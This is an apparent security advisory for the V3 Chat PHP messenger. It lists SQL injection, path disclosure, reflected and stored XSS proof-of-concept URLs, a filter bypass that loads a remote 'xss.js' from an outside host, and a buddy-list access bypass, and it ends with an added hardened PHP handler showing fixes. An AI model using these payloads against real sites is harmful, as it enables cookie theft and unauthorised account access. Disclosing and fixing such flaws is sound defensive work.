V3 Chat Instant Messenger
http://www.v3chat.com/

Affected files:
/mail/index.php
/mail/reply.php
is_online.php
online.php
profile.php
profileview.php
search.php
mycontacts.php
expire.php
* Editing your profile:
  - input boxes

------------------------------------------

Mail Vulnerabilities:

Full path disclosure via SQL injection on id when reading mail:
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1'

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/v3chat/mail/index.php on line 17

XSS vuln with cookie disclosure:
We can bypass V3 Chat's filters by using malformed img tags around our script tags.
PoC:
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1">

Replying to mail XSS vulns:
http://www.example.com/v3chat/mail/reply.php?&recipientname=Scorpio&mid=62&id=1">

---------------------------------------

Members online XSS vulns with cookie disclosure:
http://www.example.com/v3chat/members/is_online.php?membername=demo&action=update&login_id=">

Same as above, on online.php:
http://www.example.com/messenger/online.php?action=update&membername=luny666&site_id=">

Adding members via online.php, MySQL error & full path disclosure:
http://www.example.com/messenger/online.php?action=update&membername='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/messenger/online.php on line 5
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Online', 'Jun 17, 2006 - 9:55 pm', '1150577732', '')' at line 1

-------------------------------------

Search.php XSS vuln:
http://www.example.com/messenger/search.php?action=update&membername=&action=search&site_id=">

Adding a member from search.php XSS vuln:
http://www.example.com/messenger/search.php?membername=luny666&memberid=287&contact_id=1&contact_name=&site_id=&add=1&s=1&r=0&min_age=16&max_age=100&location=&gender1=&gender2=

--------------------------------------

Same as above, this time on profile.php:
http://www.example.com/messenger/profile.php?new_reg=1&site_id=">

-----------------------------------

Same as above, on profileview.php now:
http://www.example.com/messenger/profileview.php?membername=demo">

----------------------------------

XSS vuln with cookie disclosure when editing profile:
To bypass V3 Chat's filters we can use this XSS example. Credits to RSnake. Script tags wrapped around a document.write function that writes part of our second script tag.
PT SRC="http://youfucktard.com/xss.js">

-------------------------------

Mycontacts.php XSS vulns with user bypass.
It seems that after you log in as a user you're able to put any username in membername= and it will navigate you to their buddy list. From there you can add, remove, chat with, etc. the people on their buddy list.
PoC:
http://example.com/messenger/mycontacts.php?membername=putausername

-------------------------------

Expire.php XSS vuln:
http://example.com/messenger/expire.php?cust_name=">

-----------------------------

Screenshots:
http://www.youfucktard.com/xsp/v3chat1.jpg
http://www.youfucktard.com/xsp/v3chat2.jpg
http://www.youfucktard.com/xsp/v3chat3.jpg
http://www.youfucktard.com/xsp/v3chat4.jpg
http://www.youfucktard.com/xsp/v3chat5.jpg
http://www.youfucktard.com/xsp/v3chat6.jpg
http://www.youfucktard.com/xsp/v3chat7.jpg
http://www.youfucktard.com/xsp/v3chat8.jpg
http://www.youfucktard.com/xsp/v3chat9.jpg
http://www.youfucktard.com/xsp/v3chat10.jpg
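The mail-reading SQL injection, the path disclosure from echoed mysql_fetch_array() warnings, the reflected XSS on the listed parameters and the mycontacts.php membername= bypass all come from the same three gaps: request values reaching SQL and HTML unescaped, PHP warnings shown to the client, and no check that the requester owns the record. The handler below is an added illustration of how a mail read page closes all three; it is not V3 Chat's code, and the table and column names (mail, id, recipient_id, subject, body), the session key member_id and the database credentials are assumptions.

```php
<?php
// Added example: a hardened mail/index.php?action=read handler.
// Table/column names, the session key and DSN credentials are assumptions.
declare(strict_types=1);
session_start();

// 1. Never show PHP warnings to the browser: that is the full path disclosure.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// 2. Validate the type of mid before it goes anywhere near SQL.
$mid = filter_input(INPUT_GET, 'mid', FILTER_VALIDATE_INT);
if ($mid === false || $mid === null) {
    http_response_code(400);
    exit('Invalid message id.');
}
// Identity comes from the session, never from ?id= or ?membername=.
$memberId = $_SESSION['member_id'] ?? null;
if (!is_int($memberId)) {
    http_response_code(401);
    exit('Login required.');
}

// 3. Parameterised query: the value can no longer change the statement.
$pdo = new PDO('mysql:host=localhost;dbname=v3chat', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
try {
    $stmt = $pdo->prepare(
        'SELECT subject, body FROM mail WHERE id = :mid AND recipient_id = :owner'
    );
    $stmt->execute([':mid' => $mid, ':owner' => $memberId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    error_log($e->getMessage());   // details go to the server log only
    http_response_code(500);
    exit('Temporary error.');
}
if ($row === false) {               // not found and not yours give the same answer
    http_response_code(404);
    exit('No such message.');
}

// 4. Escape on output so a stored "> or <script> payload renders as text.
$esc = static fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
header('Content-Type: text/html; charset=UTF-8');
echo '<h1>', $esc($row['subject']), '</h1>';
echo '<pre>', $esc($row['body']), '</pre>';
```

The ownership condition in the WHERE clause is what the mycontacts.php page lacks: applying the same pattern there means the buddy list is always looked up by the session's member id, not by a membername= parameter.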